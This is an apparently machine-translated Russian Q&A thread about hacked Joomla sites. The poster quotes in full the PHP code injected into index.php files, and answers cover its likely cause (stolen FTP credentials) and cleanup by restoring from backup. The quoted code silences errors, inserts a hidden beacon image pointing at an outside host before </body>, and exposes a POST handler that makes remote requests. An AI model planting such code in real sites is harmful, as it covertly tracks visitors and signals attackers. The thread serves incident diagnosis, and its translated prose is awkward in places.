Выяснение того, кто взломал мой сайт [дубликат]
Возможный дубликат:
Мой сервер был взломан СРОЧНО
All Joomla! сайты, размещенные на одном моем сервере, были взломаны, и в файлы index.php во многих каталогах был внедрен следующий код.
<?php
//{{126104ed
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
$links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
preg_match("|</body>|si",$str,$arr);
return str_replace($arr[0],$links.$arr[0],$str);
}
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
else
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}
//}}861921ab
Насколько мне известно и согласно всей документации, моя Joomla! сайты были в безопасности. Однако все они на одном сервере были взломаны одновременно. Виноваты хозяева?
Кто-нибудь знает, с чего мне начать убирать этот беспорядок? Есть ли какие-нибудь быстрые решения, кроме резервного копирования моего сайта?
И самый большой вопрос, который у меня есть, - как лучше всего отследить хакера до его / ее сайта, сервера или местоположения? Я действительно хочу выразить им свою признательность за их работу.
Мое предположение - то, что они получили пароль для Вашего сервера с троянцем. Проверьте свой компьютер как можно скорее, особенно при хранении паролей сервера в какой-либо программе (браузер, клиенты ftp, общий командующий, и т.д.) Btw: я предполагаю, что Вы используете окна
О трассировке хакера, не попытка быть легким. Сначала проверьте журналы доступа со времени, это произошло. Вы будете, вероятно, видеть тонны действия ftp там. Взгляните на IP тех журналов. Если все они отличаются, то он, вероятно, использует компьютеры зомби и его очень маловероятное, которое Вы получите ему. Если они являются всеми одинаковыми, то Вы могли бы быть немного более удачливыми.
Так или иначе это походит на автоматизированное нападение. Сделайте поиск, чтобы проверить, ввели ли другим сайтам (не в Вашем сервере) тот же код им.
"Когда далеко я знал и согласно всей документации, моему Joomla! сайты были безопасны".
Тот оператор является Вашей первой проблемой. Если Вы гуглите для "joomla взломанный" существует 280 000 результатов только в прошлом месяце одних...
До восстановления я не положил бы, что что-либо пугается восстановления от известного хорошего резервного копирования. Те редактирования - просто те, Вы нашли. Кто знает то, что еще, возможно, было помещено там.
Для того, чтобы разыскать их, Вы могли бы хотеть запуститься путем чтения этого: http://kb.siteground.com/article/Joomla_hacked.html
Вкратце я сказал бы, что Ваши возможности близко к нолю. Однако они повышаются на несколько процентных пунктов, если у Вас, оказывается, есть правительственная поддержка или богатство.
Вы не предоставляете нам достаточно подробной информации, чтобы смочь помочь с, как, это было почти наверняка автоматизированное нападение, и пытающийся разыскать это просто потратит впустую Ваше время.
Нет никакого быстрого способа восстановиться с этого. Уничтожение с орбиты и восстановление от известного хорошего резервного копирования являются единственным способом пойти.
Существует некоторое объяснение об этом здесь:
http://sucuri.net/malware/malware-entry-mwbackdoor23
Который, кажется, бэкдор, и img src просто используется, чтобы уведомить взломщиков, что бэкдор там...